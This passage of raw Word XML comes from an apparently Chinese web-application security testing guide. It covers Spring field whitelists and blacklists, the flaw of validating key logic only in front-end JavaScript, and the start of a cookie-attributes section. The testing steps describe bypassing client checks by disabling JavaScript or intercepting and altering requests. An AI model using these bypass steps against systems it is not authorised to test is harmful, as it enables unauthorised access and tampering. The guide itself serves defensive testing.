              <w:t>companyName</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37A81817"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46B10CD0"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Getters &amp; Setters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6700E34E" w14:textId="2BD9538F"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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="378C48C1" w14:textId="590998F4" w:rsidR="00F27F34" w:rsidRPr="00C15061" w:rsidRDefault="00F27F34" w:rsidP="00C15061">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>白名单</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="009075F6" w:rsidRPr="00C15061" w14:paraId="144977C2" w14:textId="77777777" w:rsidTr="00D9276E">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218D59"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Controller</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22384894"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class </w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>companyInfo</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>Controller</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="644526EA"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4BF2BC5E"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InitBinder</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A31486D"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void initBinder(WebDataBinder binder, WebRequest request)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FB4551E"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1432195F"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binder.setAllowedFields(["</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>xxx</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>","</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>xxx</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>","</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>xxx</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>"]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61041133"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7414BA80"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5A43ACB2"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">     ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B519838" w14:textId="01274D66"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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63EF36A0" w14:textId="7AF22DDE" w:rsidR="00F27F34" w:rsidRPr="00C15061" w:rsidRDefault="00F27F34" w:rsidP="00C15061">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>黑名单</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="009075F6" w:rsidRPr="00C15061" w14:paraId="2EB33D2E" w14:textId="77777777" w:rsidTr="00D9276E">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FA40D0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Controller</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23944745"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class </w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>companyInfo</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>Controller</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A7EDC5D"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3FD89B6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InitBinder</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73CE7A0F"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void initBinder(WebDataBinder binder, WebRequest request)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="532D81C4"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13D820D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binder.setDisallowedFields(["</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>companyName</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>"]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6570630B"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23948AC5"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149C5F04"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6CB31ED8" w14:textId="6C9813B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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F29614B" w14:textId="1BD7E3ED" w:rsidR="009075F6" w:rsidRPr="00C15061" w:rsidRDefault="008446BE" w:rsidP="00C15061">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B35F232" w14:textId="378CB4C5" w:rsidR="0094664F" w:rsidRPr="00F757E4" w:rsidRDefault="0094664F" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc498434531"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键逻辑判断前端验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="07F2D62E" w14:textId="07BA0F13" w:rsidR="0094664F" w:rsidRPr="00AB2413" w:rsidRDefault="0094664F" w:rsidP="00AB2413">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00D34B75" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键逻辑仅在前端</w:t>
      </w:r>
      <w:r w:rsidR="00D34B75" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:r w:rsidR="00D34B75" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处进行验证，导致</w:t>
      </w:r>
      <w:r w:rsidR="00C7617F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidR="00D34B75" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以绕过前端验证直接</w:t>
      </w:r>
      <w:r w:rsidR="00C7617F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向服务端</w:t>
      </w:r>
      <w:r w:rsidR="00D34B75" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidR="00C7617F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidR="00D34B75" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5AB56F" w14:textId="77777777" w:rsidR="008A4691" w:rsidRPr="00AB2413" w:rsidRDefault="0094664F" w:rsidP="00AB2413">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A797210" w14:textId="528A5C6B" w:rsidR="00624AA6" w:rsidRPr="00AB2413" w:rsidRDefault="008A4691" w:rsidP="00AB2413">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启代理软件拦截请求功能，查看关键逻辑判断是发生在前端还是向服务端发送请求</w:t>
      </w:r>
      <w:r w:rsidR="00624AA6" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去验证；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09396350" w14:textId="59C5AB00" w:rsidR="0094664F" w:rsidRPr="00AB2413" w:rsidRDefault="003D1BD1" w:rsidP="00AB2413">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若在前端验证，则可通过禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过前端检测，或先在前端输入</w:t>
      </w:r>
      <w:r w:rsidR="00624AA6" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>符合条件的数据，然后拦截请求包，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E1718" w14:textId="25E8E1F6" w:rsidR="0094664F" w:rsidRPr="00AB2413" w:rsidRDefault="00C24790" w:rsidP="00AB2413">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="0094664F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="000266F1" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键逻辑判断前端验证通常发生在上传文件时校验文件格式、验证表单输入内容是否合法</w:t>
      </w:r>
      <w:r w:rsidR="00900D5F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、验证码校验</w:t>
      </w:r>
      <w:r w:rsidR="000266F1" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等场景。攻击者可利用该漏洞上传任意文件、插入跨站脚本等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD8AEAF" w14:textId="77777777" w:rsidR="0094664F" w:rsidRPr="00AB2413" w:rsidRDefault="0094664F" w:rsidP="00AB2413">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B26DE7" w14:textId="3E578C9D" w:rsidR="0094664F" w:rsidRPr="00AB2413" w:rsidRDefault="009514A4" w:rsidP="00AB2413">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00900D5F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前端进行校验，绕过之后可执行后续业务操作</w:t>
      </w:r>
      <w:r w:rsidR="00900D5F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00900D5F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取服务器权限</w:t>
      </w:r>
      <w:r w:rsidR="00900D5F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00900D5F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改用户信息</w:t>
      </w:r>
      <w:r w:rsidR="00900D5F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00900D5F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改业务数据</w:t>
      </w:r>
      <w:r w:rsidR="00900D5F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00900D5F" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证码本地校验</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406A053B" w14:textId="47C4AE89" w:rsidR="009514A4" w:rsidRPr="00AB2413" w:rsidRDefault="009514A4" w:rsidP="00AB2413">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：前端进行校验，绕过用户名密码组成规则或对业务影响不大。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3812A398" w14:textId="7120E1B6" w:rsidR="0094664F" w:rsidRDefault="0094664F" w:rsidP="00AB2413">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00C342F2" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议在不影响业务的前提下，关键业务逻辑放在服务端判断</w:t>
      </w:r>
      <w:r w:rsidR="00710FBC" w:rsidRPr="00AB2413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444FB983" w14:textId="418CBC31" w:rsidR="008446BE" w:rsidRPr="00AB2413" w:rsidRDefault="008446BE" w:rsidP="00AB2413">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5E72DE9" w14:textId="2B8BA5D4" w:rsidR="00B648AD" w:rsidRPr="00AD537C" w:rsidRDefault="00E4042A" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc498434532"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护功能缺失</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="30D90BBB" w14:textId="79EB3D0D" w:rsidR="00B648AD" w:rsidRPr="00F757E4" w:rsidRDefault="00E4042A" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc498434533"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性问题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="52D7AF71" w14:textId="3C396D1F" w:rsidR="00B648AD" w:rsidRPr="00267BE4" w:rsidRDefault="00B648AD" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性缺乏相关的安全属性，如</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性、</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性、</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性、</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
